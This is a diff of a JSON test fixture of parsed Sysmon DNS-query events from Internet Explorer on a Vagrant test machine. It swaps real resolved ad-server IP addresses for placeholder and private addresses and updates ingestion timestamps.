pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4054,12 +3998,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -4075,13 +4019,13 @@ "googleads.g.doubleclick.net" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313787218Z", + "ingested": "2021-12-09T13:49:44.739266800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4149,47 +4093,47 @@ "type": "CNAME" }, { - "data": "52.22.184.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.30.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.70.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.158.57.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.6.39.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.113.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.8.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.215.246.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -4206,20 +4150,13 @@ "pixel.advertising.com" ], "ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313788773Z", + "ingested": "2021-12-09T13:49:44.739272600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4291,15 +4228,15 @@ "type": "CNAME" }, { - "data": "54.210.214.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.202.202.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4307,16 +4244,16 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -4334,17 +4271,16 @@ "onevideosync.uplynk.com" ], "ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313790203Z", + "ingested": "2021-12-09T13:49:44.739278400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4392,7 +4328,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313791534Z", + "ingested": "2021-12-09T13:49:44.739284300Z", "code": "16", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e16\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e16\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:37.933324000Z'/\u003e\u003cEventRecordID\u003e1\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4616' ThreadID='4724'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-3541430928-2051711210-1391384369-1001'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.933\u003c/Data\u003e\u003cData Name='Configuration'\u003eC:\\Users\\vagrant\\Downloads\\\"C:\\Users\\vagrant\\Downloads\\Sysmon.exe\" -i -n\u003c/Data\u003e\u003cData Name='ConfigurationFileHash'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -4456,12 +4392,12 @@ "type": "CNAME" }, { - "data": "50.116.194.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "network": { @@ -4477,13 +4413,13 @@ "ad.turn.com" ], "ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313792745Z", + "ingested": "2021-12-09T13:49:44.739290300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4547,47 +4483,47 @@ "type": "CNAME" }, { - "data": "34.225.20.218", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.14.125", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.28.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.103.132", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.4.86.222", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.21.200.160", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.216.249.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.175.146", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -4603,20 +4539,13 @@ "ups.analytics.yahoo.com" ], "ip": [ - "34.225.20.218", - "3.216.14.125", - "52.200.28.150", - "3.216.103.132", - "52.4.86.222", - "52.21.200.160", - "3.216.249.238", - "3.94.175.146" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313794060Z", + "ingested": "2021-12-09T13:49:44.739296200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.611Z", @@ -4680,39 +4609,39 @@ "type": "CNAME" }, { - "data": "34.237.248.89", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.21.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.238.112", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.93.38", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.227.35.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.169.96.208", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.206.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.81.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4720,22 +4649,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -4751,23 +4680,16 @@ "pm.w55c.net" ], "ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313795525Z", + "ingested": "2021-12-09T13:49:44.739302Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 